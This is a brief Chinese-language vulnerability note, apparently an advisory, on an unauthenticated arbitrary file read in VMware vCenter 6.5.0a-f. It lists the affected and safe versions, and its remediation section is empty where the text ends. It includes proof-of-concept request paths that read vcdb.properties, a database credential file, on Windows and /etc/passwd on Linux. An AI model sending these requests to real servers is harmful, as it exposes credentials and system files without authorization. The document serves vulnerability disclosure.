VMware vCenter 服務器是一種高級服務器管理軟件,提供一個用於控制 VMware vSphere 環境的集中式平台,幫助用戶獲取集中式可見性、簡單高效的規模化管理,從而在整個混合雲中自動部署和交付虛擬基礎架構。
VMware vCenter特定版本存在任意文件讀取漏洞。未經身份驗證的攻擊者可通過向目標系統發送特制請求包來利用此漏洞,成功利用此漏洞的遠程攻擊者可在目標系統讀取任意文件。
二、漏洞影響版本
已知影響版本 VMware vCenter 6.5.0a-f
安全版本 VMware vCenter 6.5u1
三、漏洞復現
poc:
#windows /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties #linux /eam/vib?id=/etc/passwd
四、漏洞修復